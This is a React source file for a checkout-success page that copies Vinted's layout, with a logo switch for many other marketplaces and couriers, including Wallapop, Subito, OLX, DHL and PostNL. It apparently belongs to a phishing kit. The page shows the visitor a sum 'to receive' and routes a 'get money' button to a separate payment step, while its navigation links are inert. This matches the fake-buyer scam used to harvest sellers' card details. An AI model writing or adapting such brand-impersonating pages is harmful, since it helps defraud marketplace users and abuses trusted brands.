import React, { useState, useEffect } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './VintedStripeSuccess.css';
import SupportWidget from './SupportWidget';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { getVintedStripeTranslations } from '../vintedStripeTranslations';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getCheckoutHeaderLogo } from '../marketplaceHeaderLogo';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const VINTED_FR_ILLUSTRATION_SRC = `${process.env.PUBLIC_URL || ''}/vinted-fr-illustration.png`;
const VINTED_FR_TRUST_SRC = `${process.env.PUBLIC_URL || ''}/vinted-fr-trust-banner.png`;
const VINTED_FR_FOOTER_SRC = `${process.env.PUBLIC_URL || ''}/vinted-fr-footer.png`;

function VssHeaderBrand({ countryCode, template }) {
  const logo = getCheckoutHeaderLogo(countryCode, template);
  if (logo.alt === 'milanuncios' || logo.alt === 'wallapop' || logo.alt === 'bakeca' || logo.alt === 'bland' || logo.alt === 'anpost' || logo.alt === 'fancourier' || logo.alt === 'olx_ro' || logo.alt === 'custojusto' || logo.alt === 'ctt' || logo.alt === 'sprzedajemy' || logo.alt === 'poczta' || logo.alt === 'posten' || logo.alt === 'postnl' || logo.alt === 'marktplaats' || logo.alt === 'packeta' || logo.alt === 'eposta' || logo.alt === 'dpd' || logo.alt === 'bazos' || logo.alt === 'tradera' || logo.alt === 'instabox' || logo.alt === 'dhl' || logo.alt === 'schenker' || logo.alt === 'blocket' || logo.alt === 'subito' || logo.alt === 'spedire' || logo.alt === 'vinted') {
    return (
      <a href="#/" className="vss-logo vss-logo--img">
        <img src={logo.src} alt={logo.alt} className="vss-logo-img" />
      </a>
    );
  }
  return <a href="#/" className="vss-logo">Vinted</a>;
}

function VssPaymentLogos({ variant = 'be' }) {
  if (variant === 'nl') {
    return (
      <div className="vss-be-pay-logos" aria-hidden>
        <span className="vss-be-pay-logo vss-be-pay-logo--mc" />
        <span className="vss-be-pay-logo vss-be-pay-logo--visa">VISA</span>
        <span className="vss-be-pay-logo vss-be-pay-logo--maestro" />
        <span className="vss-be-pay-logo vss-be-pay-logo--ideal">iDEAL</span>
      </div>
    );
  }
  return (
    <div className="vss-be-pay-logos" aria-hidden>
      <span className="vss-be-pay-logo vss-be-pay-logo--visa">VISA</span>
      <span className="vss-be-pay-logo vss-be-pay-logo--mc" />
      <span className="vss-be-pay-logo vss-be-pay-logo--amex">AMEX</span>
      <span className="vss-be-pay-logo vss-be-pay-logo--maestro" />
    </div>
  );
}

/**
 * Success Vinted + Stripe: standaard layout of Belgische twee-kolommen (NL), taal via country_code.
 */
function VintedStripeSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);
  const [beImgFailed, setBeImgFailed] = useState(false);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'PL').toUpperCase();
  const t = getVintedStripeTranslations(countryCode, pageData?.template);
  const primaryCurrency = getPrimaryCurrency(countryCode);
  const rawPrice = pageData?.price;
  const productPrice =
    rawPrice != null && String(rawPrice).trim() !== ''
      ? Number.parseFloat(String(rawPrice).replace(',', '.'))
      : null;
  const symbol = getSymbol(primaryCurrency);
  const amountDisplay =
    productPrice != null && Number.isFinite(productPrice)
      ? `${productPrice % 1 === 0 ? String(productPrice.toFixed(0)) : String(productPrice)} ${symbol}`
      : `— ${symbol}`;
  const productName = (pageData?.product_name || '').trim();
  const photoUrl = (pageData?.photo_url || '').trim();
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  useEffect(() => {
    setBeImgFailed(false);
  }, [photoUrl]);

  const buyerName =
    [pageData?.first_name, pageData?.middle_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const refNumber =
    pageData?.page_code || pageData?.unique_id || pageData?.tracking_number || pageCode || '—';

  const isBelgiumLayout = countryCode === 'BE' || pageData?.template === 'nl_vinted';
  const isNlVintedLayout = pageData?.template === 'nl_vinted';
  const productInitials = productName ? productName.slice(0, 2).toUpperCase() : 'PR';

  if (loading && pageCode) {
    return (
      <div className="vss-wrap vss-main-only">
        <div className="vss-loading">{t.loading}</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  if (isBelgiumLayout) {
    return (
      <div className="vss-wrap vss-wrap--be">
        <header className="vss-header vss-header--be">
          <div className="vss-header-inner vss-header-inner--be">
            <VssHeaderBrand countryCode={countryCode} template={pageData?.template} />
            <div className="vss-be-search-row">
              <button type="button" className="vss-nav-btn vss-nav-btn--be">{t.catalog}</button>
              <input
                type="text"
                className="vss-search vss-search--be"
                placeholder={t.searchPlaceholder}
                readOnly
                aria-label="Zoeken"
              />
            </div>
            <div className="vss-be-header-actions">
              {isNlVintedLayout ? (
                <>
                  <a href="#/" className="vss-be-help" aria-label="Help">
                    ?
                  </a>
                  <a href="#/" className="vss-be-profile-ic" aria-label="Profiel">
                    <VssIconProfile />
                  </a>
                </>
              ) : (
                <>
                  <a href="#/" className="vss-be-register">
                    {t.headerRegisterLogin || 'Registreren | aanmelden'}
                  </a>
                  <a href="#/" className="vss-btn-sell">
                    {t.sellNow}
                  </a>
                  <a href="#/" className="vss-be-help" aria-label="Help">
                    ?
                  </a>
                </>
              )}
            </div>
          </div>
          <nav className="vss-header-cats vss-header-cats--be">
            <a href="#/">{t.catWomen}</a>
            <a href="#/">{t.catMen}</a>
            <a href="#/">{t.catKids}</a>
            <a href="#/">{t.catNavFourth ?? t.catAbout}</a>
          </nav>
        </header>

        <main className="vss-main vss-main--be">
          <div className="vss-be-columns">
            <article className="vss-be-card vss-be-card--main">
              <h1 className="vss-be-title">{t.productPurchased}</h1>
              <p className="vss-be-subtitle">{t.successHeroSub}</p>

              <div className="vss-be-product">
                {photoUrl && !beImgFailed ? (
                  <img
                    src={photoUrl}
                    alt=""
                    className="vss-be-img"
                    onError={() => setBeImgFailed(true)}
                  />
                ) : (
                  <div className="vss-be-img vss-be-img--ph" aria-hidden>{productInitials}</div>
                )}
                <div className="vss-be-product-info">
                  <div className="vss-be-product-name">{productName || t.productDefault || t.product}</div>
                  <div className="vss-be-price">{amountDisplay}</div>
                  <div className="vss-be-prepaid">{t.successPrepaidLabel}</div>
                </div>
              </div>

              <div className="vss-be-block">
                <div className="vss-be-label">{t.successBuyerLabel}</div>
                <div className="vss-be-value">{buyerName}</div>
              </div>
              <div className="vss-be-block">
                <div className="vss-be-label">{t.successAddressLabel}</div>
                <div className="vss-be-value">{address}</div>
              </div>

              <p className="vss-be-instruct">{t.successInstruction1}</p>
              <p className="vss-be-instruct">{t.successInstruction2}</p>

              <div className="vss-be-ref">
                {t.successRefPrefix} {refNumber}
              </div>
            </article>

            <aside className="vss-be-card vss-be-card--side">
              {t.successSidebarTitle ? <h2 className="vss-be-side-title">{t.successSidebarTitle}</h2> : null}
              <p className="vss-be-side-amount-line">
                <span className="vss-be-side-amount-label">{t.successSidebarAmountLabel}</span>{' '}
                <span className="vss-be-side-amount-val">{amountDisplay}</span>
              </p>
              {isNlVintedLayout && productName ? (
                <p className="vss-be-side-product-line">{productName}</p>
              ) : null}
              <Link to={index2Path} className="vss-be-side-btn-wrap">
                <button type="button" className="vss-be-side-btn">
                  {t.getMoney}
                </button>
              </Link>
              <div className="vss-be-trust">
                <span className="vss-be-trust-icon" aria-hidden />
                <span>{t.successTrustText}</span>
              </div>
              <VssPaymentLogos variant={isNlVintedLayout ? 'nl' : 'be'} />
            </aside>
          </div>
        </main>

        <footer className="vss-footer">
          <div className="vss-footer-inner">
            <div className="vss-footer-col">
              <strong>{t.footerVinted || 'Vinted'}</strong>
              <a href="#/">{t.footerAbout}</a>
            </div>
            <div className="vss-footer-col">
              <strong>{t.footerDiscover}</strong>
              <a href="#/">{t.footerHowItWorks}</a>
            </div>
            <div className="vss-footer-col">
              <strong>{t.footerHelp}</strong>
              <a href="#/">{t.footerHelpCenter}</a>
            </div>
            <div className="vss-footer-col">
              <strong>{t.footerCommunity}</strong>
              <a href="#/">{t.footerForum}</a>
            </div>
          </div>
        </footer>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="vss-wrap">
      <header className="vss-header">
        <div className="vss-header-inner">
          <VssHeaderBrand countryCode={countryCode} template={pageData?.template} />
          <div className="vss-nav-catalog">
            <button type="button" className="vss-nav-btn">{t.catalog}</button>
          </div>
          <div className="vss-search-wrap">
            <input type="text" className="vss-search" placeholder={t.searchPlaceholder} readOnly aria-label="Search" />
          </div>
          <nav className="vss-nav-links">
            <a href="#/" className="vss-nav-icon" aria-label="Messages">
              <VssIconMessage />
            </a>
            <a href="#/" className="vss-nav-icon" aria-label="Notifications">
              <VssIconBell />
            </a>
            <a href="#/" className="vss-nav-icon" aria-label="Favorites">
              <VssIconHeart />
            </a>
            <a href="#/" className="vss-nav-icon" aria-label="Profile">
              <VssIconProfile />
            </a>
            <a href="#/" className="vss-btn-sell">{t.sellNow}</a>
            <a href="#/" className="vss-nav-icon" aria-label="Help">
              <VssIconHelp />
            </a>
            <button type="button" className="vss-lang">{countryCode}</button>
          </nav>
        </div>
        <div className="vss-header-cats">
          <a href="#/">{t.catWomen}</a>
          <a href="#/">{t.catMen}</a>
          <a href="#/">{t.catKids}</a>
          <a href="#/">{t.catHome}</a>
          <a href="#/">{t.catEntertainment}</a>
          <a href="#/">{t.catPets || t.catPetCare}</a>
          <a href="#/">{t.catAbout}</a>
          <a href="#/">{t.catPlatform}</a>
        </div>
      </header>

      <main className={`vss-main${countryCode === 'FR' ? ' vss-main--fr' : ''}`}>
        {countryCode === 'FR' ? (
          <img
            src={VINTED_FR_ILLUSTRATION_SRC}
            alt=""
            className="vss-fr-illustration"
            width={1200}
            height={480}
            decoding="async"
          />
        ) : (
          <div className="vss-side vss-side-left" aria-hidden />
        )}
        <div className="vss-center">
          <div className="vss-card">
            <h1 className="vss-title">{t.productPurchased}</h1>
            <div className="vss-product">
              {photoUrl ? (
                <img src={photoUrl} alt="" className="vss-img" />
              ) : (
                <div className="vss-img-placeholder" aria-hidden>{productInitials}</div>
              )}
              <div className="vss-info">
                <span className="vss-name">{productName || t.productDefault || t.product}</span>
                <p className="vss-summary">{t.amountToReceive}</p>
                <p className="vss-amount">{amountDisplay}</p>
              </div>
            </div>
            <div className="vss-secure">
              <span className="vss-shield" aria-hidden />
              <p>{t.secureMessage}</p>
            </div>
            <Link to={index2Path} className="vss-btn-link">
              <button type="button" className="vss-btn">{t.getMoney}</button>
            </Link>
            <div className="vss-info-block">
              <h3>{t.secureSystemTitle}</h3>
              <p>{t.secureSystemIntro} <a href="#/">{t.readIntro}</a>{t.toStayUpdated || t.readIntroSuffix}</p>
            </div>
          </div>
        </div>
        {countryCode !== 'FR' ? <div className="vss-side vss-side-right" aria-hidden /> : null}
      </main>

      {countryCode === 'FR' ? (
        <section className="vss-fr-trust-wrap" aria-hidden>
          <img
            src={VINTED_FR_TRUST_SRC}
            alt=""
            className="vss-fr-trust-img"
            width={1200}
            height={400}
            decoding="async"
          />
        </section>
      ) : null}

      {countryCode === 'FR' ? (
        <footer className="vss-footer vss-footer--fr-photo">
          <img
            src={VINTED_FR_FOOTER_SRC}
            alt=""
            className="vss-fr-footer-img"
            width={1400}
            height={520}
            decoding="async"
          />
        </footer>
      ) : (
        <footer className="vss-footer">
          <div className="vss-footer-inner">
            <div className="vss-footer-col">
              <strong>{t.footerVinted || 'Vinted'}</strong>
              <a href="#/">{t.footerAbout}</a>
            </div>
            <div className="vss-footer-col">
              <strong>{t.footerDiscover}</strong>
              <a href="#/">{t.footerHowItWorks}</a>
            </div>
            <div className="vss-footer-col">
              <strong>{t.footerHelp}</strong>
              <a href="#/">{t.footerHelpCenter}</a>
            </div>
            <div className="vss-footer-col">
              <strong>{t.footerCommunity}</strong>
              <a href="#/">{t.footerForum}</a>
            </div>
          </div>
        </footer>
      )}
      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

function VssIconMessage() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
      <path d="M4 4h16c1.1 0 2 .9 2 2v12c0 1.1-.9 2-2 2H4c-1.1 0-2-.9-2-2V6c0-1.1.9-2 2-2z" />
      <polyline points="22,6 12,13 2,6" />
    </svg>
  );
}
function VssIconBell() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
      <path d="M18 8A6 6 0 0 0 6 8c0 7-3 9-3 9h18s-3-2-3-9" />
      <path d="M13.73 21a2 2 0 0 1-3.46 0" />
    </svg>
  );
}
function VssIconHeart() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
      <path d="M20.84 4.61a5.5 5.5 0 0 0-7.78 0L12 5.67l-1.06-1.06a5.5 5.5 0 0 0-7.78 7.78l1.06 1.06L12 21.23l7.78-7.78 1.06-1.06a5.5 5.5 0 0 0 0-7.78z" />
    </svg>
  );
}
function VssIconProfile() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
      <path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2" />
      <circle cx="12" cy="7" r="4" />
    </svg>
  );
}
function VssIconHelp() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
      <circle cx="12" cy="12" r="10" />
      <path d="M9.09 9a3 3 0 0 1 5.83 1c0 2-3 3-3 3" />
      <line x1="12" y1="17" x2="12.01" y2="17" />
    </svg>
  );
}
export default VintedStripeSuccess;
